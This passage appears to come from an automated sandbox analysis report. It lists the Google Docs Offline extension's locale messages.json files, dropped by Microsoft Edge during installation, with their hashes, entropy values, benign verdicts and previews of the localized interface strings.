                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):978
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                        MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                        SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                        SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                        SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):907
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                        MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                        SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                        SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                        SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                        MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                        SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                        SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                        SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):937
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                        MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                        SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                        SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                        SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1337
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                        MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                        SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                        SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                        SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2846
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                        MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                        SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                        SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                        SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):934
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                        MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                        SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                        SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                        SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):963
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                        MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                        SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                        SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                        SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1320
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                        MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                        SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                        SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                        SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):884
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                        MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                        SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                        SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                        SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):980
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                        MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                        SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                        SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                        SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1941
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                        MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                        SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                        SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                        SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1969
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                        MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                        SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                        SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
